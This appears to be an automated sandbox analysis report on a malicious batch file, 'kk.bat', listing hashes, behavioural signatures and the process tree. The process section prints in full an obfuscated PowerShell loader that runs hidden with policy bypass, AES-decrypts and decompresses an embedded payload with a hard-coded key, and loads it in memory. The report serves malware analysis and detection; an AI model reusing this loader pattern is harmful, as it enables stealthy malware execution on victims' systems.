Analysis
-
max time kernel
387s -
max time network
397s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
09-02-2023 14:38
Static task
static1
Behavioral task
behavioral1
Sample
kk.bat
Resource
win10-20220812-en
Behavioral task
behavioral2
Sample
kk.bat
Resource
win7-20221111-en
General
-
Target
kk.bat
-
Size
182KB
-
MD5
df4da1ecd4c50871a1c4315f571e4402
-
SHA1
1dbbe9b3784cf5ecdd08b27132a7e31588954865
-
SHA256
9800bef9d4936ee96d4872fb686121dd7209f8b529e9bdc833c4fe54bb68f5c8
-
SHA512
5f9e47f865c48cb1f2070d5d393a5d3494074bfe2347e07c988d06c8244dd420181c210a8ebdd54f768a64a5906d0c9e3be271d44f6e5bd32991bc2cacf85d3e
-
SSDEEP
3072:ur2RTVYk0bjRtZLlnm6Gdk8vZQfjO8KifQ6vfegRI8mlgJJ4u6A0FzfghYE:BRiltZITy8ufjLQsBUlgeMYE
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
kk.bat.exepid process 968 kk.bat.exe -
Loads dropped DLL 1 IoCs
Processes:
cmd.exepid process 1612 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
kk.bat.exepid process 968 kk.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
kk.bat.exedescription pid process Token: SeDebugPrivilege 968 kk.bat.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 1612 wrote to memory of 968 1612 cmd.exe kk.bat.exe PID 1612 wrote to memory of 968 1612 cmd.exe kk.bat.exe PID 1612 wrote to memory of 968 1612 cmd.exe kk.bat.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\kk.bat"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\kk.bat.exe"kk.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $flLnL = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\kk.bat').Split([Environment]::NewLine);foreach ($jhglm in $flLnL) { if ($jhglm.StartsWith(':: ')) { $uDeAm = $jhglm.Substring(3); break; }; };$dLIJD = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($uDeAm);$nJkwh = New-Object System.Security.Cryptography.AesManaged;$nJkwh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$nJkwh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$nJkwh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('I5NM1YScgS/1//5R8gmm/tnI3DRCjxBbFnAG0xn8rTc=');$nJkwh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mehcJXqMnXZUmnmrBD1Eeg==');$bIbyd = $nJkwh.CreateDecryptor();$dLIJD = $bIbyd.TransformFinalBlock($dLIJD, 0, $dLIJD.Length);$bIbyd.Dispose();$nJkwh.Dispose();$gJfcg = New-Object System.IO.MemoryStream(, $dLIJD);$dkGYN = New-Object System.IO.MemoryStream;$yfRSU = New-Object System.IO.Compression.GZipStream($gJfcg, [IO.Compression.CompressionMode]::Decompress);$yfRSU.CopyTo($dkGYN);$yfRSU.Dispose();$gJfcg.Dispose();$dkGYN.Dispose();$dLIJD = $dkGYN.ToArray();$qMhaY = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($dLIJD);$haTMg = $qMhaY.EntryPoint;$haTMg.Invoke($null, (, [string[]] ('')))2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\kk.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
\Users\Admin\AppData\Local\Temp\kk.bat.exeFilesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
memory/968-55-0x0000000000000000-mapping.dmp
-
memory/968-57-0x000007FEFBD91000-0x000007FEFBD93000-memory.dmpFilesize
8KB
-
memory/968-58-0x000007FEF3900000-0x000007FEF4323000-memory.dmpFilesize
10.1MB
-
memory/968-60-0x00000000022E4000-0x00000000022E7000-memory.dmpFilesize
12KB
-
memory/968-59-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmpFilesize
11.4MB
-
memory/968-61-0x00000000022EB000-0x000000000230A000-memory.dmpFilesize
124KB
-
memory/968-62-0x00000000022E4000-0x00000000022E7000-memory.dmpFilesize
12KB
-
memory/968-63-0x00000000022EB000-0x000000000230A000-memory.dmpFilesize
124KB